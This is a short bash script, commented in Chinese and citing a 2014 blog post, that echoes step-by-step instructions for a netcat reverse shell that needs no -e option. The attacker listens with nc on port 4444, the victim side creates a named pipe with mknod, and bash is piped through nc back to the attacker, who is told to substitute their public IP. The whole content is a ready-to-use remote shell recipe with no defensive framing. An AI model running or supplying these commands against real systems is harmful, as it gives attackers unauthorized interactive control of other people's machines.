#!/bin/bash -
#nc新式反弹shell
#免-e选项方式(大部分版本均未支持-e，kali除外，-e选项要编译时加进去)
#来自: http://www.91ri.org/9615.html
#2014年 07月 15日 星期二 02:08:02 CST

echo '
本地：
(连接成功后竟然支持阻塞命令如vim~,
只是显示上有些问题, 交互仍属于回车提交才返回数据式)
1. 本地监听端口:
    nc -l 4444;

远端：
2. 建立一个pipe文件(比如/tmp下):
    mknod kaka p;
3. 反弹shell(请将127.0.0.1改为本机的外网IP):
    bash <kaka 2>&1 | nc 127.0.0.1 4444 >kaka
'
